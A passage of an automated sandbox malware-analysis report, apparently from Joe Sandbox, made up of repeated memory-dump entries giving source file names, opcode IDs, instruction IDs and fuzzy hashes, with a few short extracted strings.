                                    • Instruction Fuzzy Hash: 3941173194DA8A4FE795D778985A2BD7BF0FF46390B0405BBD44CC71D2DD28A881C342
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001A.00000002.1616875899.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_26_2_7ff887af0000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: b4f
                                    • API String ID: 0-3391181744
                                    • Opcode ID: 5626410ae092d9b2fa501a31bde4a30f541bd5d6649f5d74749859d462f934ef
                                    • Instruction ID: 4f8b51dd3b5cf3361675227e08573cf18c0a68c928e370ec7fde71ad2203ec2f
                                    • Opcode Fuzzy Hash: 5626410ae092d9b2fa501a31bde4a30f541bd5d6649f5d74749859d462f934ef
                                    • Instruction Fuzzy Hash: 62319E72A1990A8FE748DFA8E8153ED7BF1EB963A1F90417AC00DC72C6CBB91455CB41
                                    Memory Dump Source
                                    • Source File: 0000001A.00000002.1616875899.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_26_2_7ff887af0000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 9fa1616d3db69b5a9d4631a19aaae8cc5587f8da503383b1131f3cfdd8395071
                                    • Instruction ID: 6499358198e5969f4ed95d6327990a1097597c4e5dec897fa072bb82de73fece
                                    • Opcode Fuzzy Hash: 9fa1616d3db69b5a9d4631a19aaae8cc5587f8da503383b1131f3cfdd8395071
                                    • Instruction Fuzzy Hash: 0F71AE32A58A498FDB88DE1CD8526BD77E2FF98744F14417AE45EC3282DE34A802C781
                                    Memory Dump Source
                                    • Source File: 0000001A.00000002.1616875899.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_26_2_7ff887af0000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 807f526946f18c3787f727d448e7fb8aedac2c633a8fd95e7e33007a09147f6b
                                    • Instruction ID: 7977c1a8f670459460aaecf0a71de19734f898e5ff20513ec130a28888ebc614
                                    • Opcode Fuzzy Hash: 807f526946f18c3787f727d448e7fb8aedac2c633a8fd95e7e33007a09147f6b
                                    • Instruction Fuzzy Hash: 3A51BD31A18A498FDB4CDE1CC8556BA77E2FF98354B14467EE44EC3286CE34E802CB81
                                    Memory Dump Source
                                    • Source File: 0000001A.00000002.1616875899.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_26_2_7ff887af0000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: cdeada81670f8f4b10e3ec29a251f4ddeb80a10dce8d24bb6134a110e6c35c24
                                    • Instruction ID: 28b6e382d777028c91433fc23dbc50c79b332cda7aa0f308bd926b08d8395234
                                    • Opcode Fuzzy Hash: cdeada81670f8f4b10e3ec29a251f4ddeb80a10dce8d24bb6134a110e6c35c24
                                    • Instruction Fuzzy Hash: 29513774D4960E8FEB58EBA4D4566ECBBB1FF58351F50417AD009E7292DF38A984CB00
                                    Memory Dump Source
                                    • Source File: 0000001A.00000002.1616875899.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_26_2_7ff887af0000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: c42b6ea764a808d7b24a44075f05e3566ff286062211c68ea7664dff25f9cb75
                                    • Instruction ID: 9bf27d9661155ac42378ee06af4d018f17bf8528acb0f72615dd10ad969b64a9
                                    • Opcode Fuzzy Hash: c42b6ea764a808d7b24a44075f05e3566ff286062211c68ea7664dff25f9cb75
                                    • Instruction Fuzzy Hash: 75216D3188D78A8FD743EBB48C195A97FF0EF47351B0944FBD449CB0A2DA299489C722
                                    Memory Dump Source
                                    • Source File: 0000001A.00000002.1616875899.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_26_2_7ff887af0000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: c154f0b75d64ab9b9af40d3f598413a22c594a63637a3ea5d93c63151e93faf0
                                    • Instruction ID: 7bb66bb6e51c93e28a0af7829b4ef3ead89c587cf82cfc9c410fae82dd4659a5
                                    • Opcode Fuzzy Hash: c154f0b75d64ab9b9af40d3f598413a22c594a63637a3ea5d93c63151e93faf0
                                    • Instruction Fuzzy Hash: 5F21497494854E8FEB95EB68C45A6BD7BF0FF98344F4008BAD41DCB191EB38A584C741
                                    Memory Dump Source
                                    • Source File: 0000001A.00000002.1616875899.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_26_2_7ff887af0000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 4a5fa4a8408d56b0748b21a73c2e3b7955814517d33264f37f08b93d416fae09
                                    • Instruction ID: f7a389d446460c29b8a1a577016651ba53e296de3ba9c967b98b710f19eafe1d
                                    • Opcode Fuzzy Hash: 4a5fa4a8408d56b0748b21a73c2e3b7955814517d33264f37f08b93d416fae09
                                    • Instruction Fuzzy Hash: 1E118F7195950E8FEB90EB68888A2FE7BF0FF58390F4045B6D428C71A6EE38A544C741
                                    Memory Dump Source
                                    • Source File: 0000001A.00000002.1616875899.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_26_2_7ff887af0000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 26c0a9936a15dd2af0b997cc146798fe11cd54e524790e583c921a03fa367dbb
                                    • Instruction ID: 4718bdf0cb6beabcf079bd5324f65511833f2986c31d06875be413e7ed9fc2ef
                                    • Opcode Fuzzy Hash: 26c0a9936a15dd2af0b997cc146798fe11cd54e524790e583c921a03fa367dbb
                                    • Instruction Fuzzy Hash: 95119D70948A498FEB99EB68C4592BE7BF0FF6A354F0005BED40AC6192EB295544C701
                                    Memory Dump Source
                                    • Source File: 0000001A.00000002.1616875899.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_26_2_7ff887af0000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 35901ac393adf6289e903dd647d7c427fd75351cf724b9f664b4f5fd47d9cdfe
                                    • Instruction ID: a089c0748611a625da37a8386132c92ad948ab3b181047ff50eb5be1f9bf74df
                                    • Opcode Fuzzy Hash: 35901ac393adf6289e903dd647d7c427fd75351cf724b9f664b4f5fd47d9cdfe
                                    • Instruction Fuzzy Hash: F8114231E4890E8FEB54EB54C896BEE77B1FF54340F104275C01AD7295CE786985CB81
                                    Memory Dump Source
                                    • Source File: 0000001A.00000002.1616875899.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_26_2_7ff887af0000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: ceea20dc05e4aa7609a475f28a7a54d0d7414ea5212ed1d844cde6bbb1a727c3
                                    • Instruction ID: 3fdee1bac1e0d20afbea624f46670d00f1fef208c682df278251b831df135aa9
                                    • Opcode Fuzzy Hash: ceea20dc05e4aa7609a475f28a7a54d0d7414ea5212ed1d844cde6bbb1a727c3
                                    • Instruction Fuzzy Hash: A7017C719A864A8FE751EB24884A2AD7BF0FF19350F0549B6D408CA0A2EA38A494C701
                                    Memory Dump Source
                                    • Source File: 0000001A.00000002.1616875899.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_26_2_7ff887af0000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: f4a2a7ba956978e3fbc55aa2de53bf14d8798a9b0f029414ab682172a8749630
                                    • Instruction ID: 05e038c3ab73c80b738f9f246ee58f4a844a900ae3c5f8f46b9ebe28e7790557
                                    • Opcode Fuzzy Hash: f4a2a7ba956978e3fbc55aa2de53bf14d8798a9b0f029414ab682172a8749630
                                    • Instruction Fuzzy Hash: 8101883094990E8FEB88EF24C05A6BE77B1FF58348F20087AD40EC7191CA36A590CB40
                                    Memory Dump Source
                                    • Source File: 0000001A.00000002.1616875899.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_26_2_7ff887af0000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: a482e6dd602a2359401034d62e186a1ea2835a23405639d6366514c54ef2f036
                                    • Instruction ID: b82483864aecba0336ea8bcdf3828578ecd313d8e27bba35c7f5014872522324
                                    • Opcode Fuzzy Hash: a482e6dd602a2359401034d62e186a1ea2835a23405639d6366514c54ef2f036
                                    • Instruction Fuzzy Hash: 0D018B3098864D8FEB51EB74848A6FD7BF0FF19340F5148B6E408CB1A2EA38E584C742
                                    Memory Dump Source
                                    • Source File: 0000001A.00000002.1616875899.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_26_2_7ff887af0000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: ee1400a4bf294821f275d85d66c58927cfaabf6bc6c5ba1fb328868d77a05cf4
                                    • Instruction ID: aa03890b9c9a2e336bbb67780b19cb63522582f5f0f45d588c6f022f1b8910ff
                                    • Opcode Fuzzy Hash: ee1400a4bf294821f275d85d66c58927cfaabf6bc6c5ba1fb328868d77a05cf4
                                    • Instruction Fuzzy Hash: 6901843199D68A4FE751AB34885A1AD7BF0FF56350F0508F6D409CB0E6EE38A494C701
                                    Memory Dump Source
                                    • Source File: 0000001A.00000002.1616875899.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_26_2_7ff887af0000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b5731fa2ab9859aaf6a75f51b340200199f25e4b79c633f1c0612d8a6614d4ea
                                    • Instruction ID: 68e0fb04b552bfa217dd3eeff84de8efc5f50530f9c6f8d739955de94f52ed9a
                                    • Opcode Fuzzy Hash: b5731fa2ab9859aaf6a75f51b340200199f25e4b79c633f1c0612d8a6614d4ea
                                    • Instruction Fuzzy Hash: 5201693099890E9BEB58EB64D45A2BD72B0FF1834AF50087EE41EC61D1DF39A590CB41
                                    Memory Dump Source
                                    • Source File: 0000001A.00000002.1616875899.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_26_2_7ff887af0000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: cf473f97ac5e8aeb6963413bd7f81f19a4949e89fe02f39262204ff552b73d36
                                    • Instruction ID: f43ba6dfa897d3596690ca83ee78bde01b3504ab972d08cd462f3a7e4bb1d132
                                    • Opcode Fuzzy Hash: cf473f97ac5e8aeb6963413bd7f81f19a4949e89fe02f39262204ff552b73d36
                                    • Instruction Fuzzy Hash: 69016930958A0E8FEB59EB64D44A2BE72B0FF18346F20087EE41EC61D5DF39A594C681
                                    Memory Dump Source
                                    • Source File: 0000001A.00000002.1616875899.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_26_2_7ff887af0000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: dc475c73fae1ce2e12ff868a48f3282378eeb1eedfd512f09efb3d4cabc68787
                                    • Instruction ID: e1d71a84e429349959165ca7a9a1cbe456e3ea45d0871fd8cf83fa9d4298a5c0
                                    • Opcode Fuzzy Hash: dc475c73fae1ce2e12ff868a48f3282378eeb1eedfd512f09efb3d4cabc68787
                                    • Instruction Fuzzy Hash: F4F0DC30D58A1E8AEB98AA68D85A3BE77F0FF56364F00017ED419C20C0DF241014C601
                                    Memory Dump Source
                                    • Source File: 0000001A.00000002.1616875899.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_26_2_7ff887af0000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: f49fc49f9072e7587d3951095f17dd3b0d04d9f1fe279729f016040fd1ff2975
                                    • Instruction ID: 676186f976255131fc2869c5e6109f7d60672895c68a0af7d7e71cb718e53cad
                                    • Opcode Fuzzy Hash: f49fc49f9072e7587d3951095f17dd3b0d04d9f1fe279729f016040fd1ff2975
                                    • Instruction Fuzzy Hash: 82F06D3085A64E8FEB58EE24D4166FE77B0FF15348F50087AE80DC2191DA39A5A0CB81
                                    Memory Dump Source
                                    • Source File: 0000001A.00000002.1616875899.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_26_2_7ff887af0000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: e9cfb72d0a37f13157d3cb057d73fdef6abdd55c91c13fe3955d6c71566bf36a
                                    • Instruction ID: 7a32f9a7e434fbc95fb78b5d4c2dc54c01f5321c415d06334517db49b9c00278
                                    • Opcode Fuzzy Hash: e9cfb72d0a37f13157d3cb057d73fdef6abdd55c91c13fe3955d6c71566bf36a
                                    • Instruction Fuzzy Hash: 90018C3094A68D8FDB58DF24C4566BD7BB0FF59344F5004BAE80CC6192DB79D994CB81
                                    Memory Dump Source
                                    • Source File: 0000001A.00000002.1616875899.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_26_2_7ff887af0000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b7d6d69900b984faffe425d4f30c473d25b831656b67c36185986036e539c384
                                    • Instruction ID: 9fff2de5433f50139efff825b3ed7d962df972d38be006f3cffe358692284e6e
                                    • Opcode Fuzzy Hash: b7d6d69900b984faffe425d4f30c473d25b831656b67c36185986036e539c384
                                    • Instruction Fuzzy Hash: 69F06D3084D3898FDB5A9B2488552ED3B70FF56205F4508BAE419C61D2DB299898C782
                                    Memory Dump Source
                                    • Source File: 0000001A.00000002.1616875899.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_26_2_7ff887af0000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: eab130d730f6caa97e99933f4a17f1aaa9450a0b11149971eac769b82466d2b3
                                    • Instruction ID: 1821b72cd1c4c208188dab298f40e528365ab1b18113e8635d8607aa58c93caa
                                    • Opcode Fuzzy Hash: eab130d730f6caa97e99933f4a17f1aaa9450a0b11149971eac769b82466d2b3
                                    • Instruction Fuzzy Hash: 2EF0BE309892498FEB599F2484562FD3BB0FF19305F4004BEE809C61D1DB399494C741
                                    Memory Dump Source
                                    • Source File: 0000001A.00000002.1616875899.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_26_2_7ff887af0000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 0c426eb85eca6ac21900330bdedabb5b409d69e244e3d01691483efb13709912
                                    • Instruction ID: 45466f8545581a05223adc35c3fe9cb94e2ecc50a98608c83a4a8bdfa761df19
                                    • Opcode Fuzzy Hash: 0c426eb85eca6ac21900330bdedabb5b409d69e244e3d01691483efb13709912
                                    • Instruction Fuzzy Hash: 9BE02B70E1992D8FDBA4EA088885BAEB6B1BF49342F1005E9844DE6280DA746E80CF44
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.1851834732.00007FF887BA8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887BA8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_28_2_7ff887ba8000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: e07268f2e593464f7d77095028d726525cbf3efdd9d18e1b8dd262ff6d2d461d
                                    • Instruction ID: c15b53a99b4c99a5afcb58ed025323443a00421b730e5e14d19c7edf10bd3ede
                                    • Opcode Fuzzy Hash: e07268f2e593464f7d77095028d726525cbf3efdd9d18e1b8dd262ff6d2d461d
                                    • Instruction Fuzzy Hash: E3429130948A8A8FEB45EB74C8596FE7BF1FF19351F0005BAD829C7192DB38A554CB42
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.1851834732.00007FF887BA8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887BA8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_28_2_7ff887ba8000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: d3fdbddbc3c95cf620b5d05bdaeb119dad1629a1a46c78886f3b3ed3a2abdec7
                                    • Instruction ID: 302aacb31bb04c9255c4a32ad0abf7b53882c8499684d77c7786a735875d74d8
                                    • Opcode Fuzzy Hash: d3fdbddbc3c95cf620b5d05bdaeb119dad1629a1a46c78886f3b3ed3a2abdec7
                                    • Instruction Fuzzy Hash: 7AD1A130959A8E8FEB85EB68C8596FE7BF1FF19340F4005BAD819C7192DE38A544C742
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.1851834732.00007FF887BA8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887BA8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_28_2_7ff887ba8000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: %$UAWA
                                    • API String ID: 0-2873630224
                                    • Opcode ID: 84d101f4f4e6450e3a315d8a9787d0333d4218da9a765e6ff7191b80a288aed9
                                    • Instruction ID: 43d275357f7268e22372ab77f0ac5777b802f3fd1b747108a19189becfd7a941
                                    • Opcode Fuzzy Hash: 84d101f4f4e6450e3a315d8a9787d0333d4218da9a765e6ff7191b80a288aed9
                                    • Instruction Fuzzy Hash: 3B71A030D5894E8FEB95DBA4C8546BEBBB2FF48384F50047AD51ED7192DE38A841CB41
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.1851834732.00007FF887BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887BA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_28_2_7ff887ba0000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: L_H
                                    • API String ID: 0-402390507
                                    • Opcode ID: 62b256636a3a5f0a6c38c3f246d908c5d8e8f696395b6141a10f75d1f742ded7
                                    • Instruction ID: a2f9ad582e987a619e102eafb7210dce7191a9d7fc3c4a0c2c3dc7c0a119d0f8
                                    • Opcode Fuzzy Hash: 62b256636a3a5f0a6c38c3f246d908c5d8e8f696395b6141a10f75d1f742ded7
                                    • Instruction Fuzzy Hash: 8E518D71D48A4D8FEB98EB68C8557ADBBF1FF5A380F54017AC00DC7296DA286801CB42
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.1851834732.00007FF887BA8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887BA8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_28_2_7ff887ba8000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 7c1cebcd5ede6b7994f34c0b80a11ca12729f07da9eb9f6fc1996066293a7309
                                    • Instruction ID: 68841de7440c152f0ddf3fb073908a02a49b9e2bf1a807d855b3e1a7fd074d19
                                    • Opcode Fuzzy Hash: 7c1cebcd5ede6b7994f34c0b80a11ca12729f07da9eb9f6fc1996066293a7309
                                    • Instruction Fuzzy Hash: 8C210930A9CE868BE6689A18514513D72F3FF9D384B24193DDE8FD3292DE6CB8028645
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.1851834732.00007FF887BA8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887BA8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_28_2_7ff887ba8000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 90dfc2d02a6176c3b59d250f5e471fc33bd980295e96638d8ab00d22a813054f
                                    • Instruction ID: bcb3f23ce447d1cfedc01ee386666bb477362bb5d40fe5c14702df7e50996c7d
                                    • Opcode Fuzzy Hash: 90dfc2d02a6176c3b59d250f5e471fc33bd980295e96638d8ab00d22a813054f
                                    • Instruction Fuzzy Hash: 86216F3085E78E8FEB96AB2488582BEBFB1FF16340F0505BBD815C6192DB389548C741
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.1851834732.00007FF887BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887BA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_28_2_7ff887ba0000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b71cc8901c13cd26025c6da78e1d5036a4f3e770167322ede8404c4ba7850ec4
                                    • Instruction ID: 781ea474dd4ce7e0b96f41445872fe1b042b4b618d7e2a30bb3881f8864baa14
                                    • Opcode Fuzzy Hash: b71cc8901c13cd26025c6da78e1d5036a4f3e770167322ede8404c4ba7850ec4
                                    • Instruction Fuzzy Hash: 5A213D3088E78A4FD783AB748C285A97FF5EF47350B0944E7D458CB0A2DA689485C722
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.1851834732.00007FF887BA8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887BA8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_28_2_7ff887ba8000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 1d139459ea0f1349b775ec4dbc9bd46f5687bf5360782b634411750861fd726b
                                    • Instruction ID: 7077cc901f84d6bb0fe6d8461e2bdec1a52a7de51e91544f736685e9078e38d2
                                    • Opcode Fuzzy Hash: 1d139459ea0f1349b775ec4dbc9bd46f5687bf5360782b634411750861fd726b
                                    • Instruction Fuzzy Hash: 41118B3098A68A8FE741EB28C8492EDBBF1FF59380F5149B6D418C7096EA38A548C751
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.1851834732.00007FF887BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887BA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_28_2_7ff887ba0000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 24dc490d661bef7074ef80636f3deb654a6fd68c43ab5e58d5f127478b0e5d58
                                    • Instruction ID: 2ce3cff6d9a74628faaf3d5bd81db779f6e79c5c2961c5759ba9b6f07af46cf4
                                    • Opcode Fuzzy Hash: 24dc490d661bef7074ef80636f3deb654a6fd68c43ab5e58d5f127478b0e5d58
                                    • Instruction Fuzzy Hash: 1921563098954A8FEF99EB68C8596BEBBA2FF58340F4004BAD42DC7191EB39A544C740
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.1851834732.00007FF887BA8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887BA8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_28_2_7ff887ba8000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: bda35dc9c0012ca2ab6ba07676216dccc31db144559ea217cae60b1ef41d659f
                                    • Instruction ID: cfa021dfa046eee41963868f96add4122c08b9d8ca618cdcaf5a6d12faca1cf2
                                    • Opcode Fuzzy Hash: bda35dc9c0012ca2ab6ba07676216dccc31db144559ea217cae60b1ef41d659f
                                    • Instruction Fuzzy Hash: BD11903094DA8A8FE741A7788C996AD7BF0FF16340F0505B7D86CC7093DA28A454C782
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.1851834732.00007FF887BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887BA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_28_2_7ff887ba0000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 5c95dc69fcfbce63d12c28b44ad8f8c00ed9af890256d8928728b5c708dcac60
                                    • Instruction ID: d81724977b8f27749ee8a5b344d876b777454e0f339a63405bd35bee07de8c5e
                                    • Opcode Fuzzy Hash: 5c95dc69fcfbce63d12c28b44ad8f8c00ed9af890256d8928728b5c708dcac60
                                    • Instruction Fuzzy Hash: 47113031E4990E8FEF54EB54C995BEEB7B2FB54340F104275C01AE7295DE386945CB80
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.1851834732.00007FF887BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887BA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_28_2_7ff887ba0000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 2c19345bd28ec5e507910e31962bae3d6cc51297d01ae71d41c1104bd4a0fe95
                                    • Instruction ID: 92aa33c43297258089ef76e020d6b0017d7f3ef8d131b42b33e546580aa6891d
                                    • Opcode Fuzzy Hash: 2c19345bd28ec5e507910e31962bae3d6cc51297d01ae71d41c1104bd4a0fe95
                                    • Instruction Fuzzy Hash: CC115A30D5990E8EEB80FB68C9492BDB7F2FF58380F400576D428C2096EE34A544CA51
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.1851834732.00007FF887BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887BA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_28_2_7ff887ba0000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: eec2bdf884c22f4a86a758629a5ee4a7bac5cd4734b71ba0f53d80dcbc83b925
                                    • Instruction ID: d5d92b138375ea217b21eff4338afd1ddc391cd60d7ae74d972d15a16ebf3418
                                    • Opcode Fuzzy Hash: eec2bdf884c22f4a86a758629a5ee4a7bac5cd4734b71ba0f53d80dcbc83b925
                                    • Instruction Fuzzy Hash: 1C11C270D4990E8AEBD9EB68C9583BEBBF1FF59344F1005BED42AC60C1DE356050C601
                                    Memory Dump Source
